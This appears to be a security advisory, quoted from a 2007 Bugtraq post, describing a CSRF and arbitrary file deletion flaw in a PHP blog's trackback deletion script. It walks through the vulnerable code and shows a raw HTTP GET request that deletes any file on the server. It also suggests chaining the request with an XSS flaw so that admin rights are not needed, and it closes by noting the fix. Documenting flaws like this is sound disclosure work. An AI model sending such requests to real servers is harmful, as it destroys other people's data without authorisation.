There is a CSRF vulnerability which can lead to file
deletion. Let's see the code of "trackback_delete_cgi.php":
22| if ( array_key_exists( 'trackback', $_GET ) ) {
23| $ok = delete_trackback( $_GET[ 'trackback' ] );
24| }
So if the variable "trackback" is set with the GET method,
the delete_trackback() function is called. The code of
this function is situated in "sb_trackback.php":
229| function delete_trackback ( $entryFile ) {
230| // Delete the old file
231| if ( file_exists( $entryFile ) ) {
232| $ok = sb_delete_file( $entryFile );
233| }
If the file exists, the function sb_delete_file() is called,
with the parameter $_GET['trackback']. The source code
of this function is situated in the file "sb_fileio.php":
171| function sb_delete_file ( $filename ) {
|
175| clearstatcache();
176| if ( file_exists( $filename ) ) {
177| $result = @unlink( $filename );
178| }
There is no verification before deleting the file. So we
can delete any files on the server. The HTTP packet sent
by the attacker will look's like this:
GET /trackback_delete_cgi.php?trackback=<FILE> HTTP/1.1\r\n
Host: localhost\r\n
Connection: keep-alive\r\n\r\n
Admin right's are needed to delete files, but because
it's also a CRLF vulnerability, we can use it in our XSS,
then so admin right's aren't needed for the attacker.
Source: http://archive.cert.uni-stuttgart.de/bugtraq/2007/10/msg00314.html
Fixed in svn r82. delete_trackback will only allow deletion of .txt files in the content dir.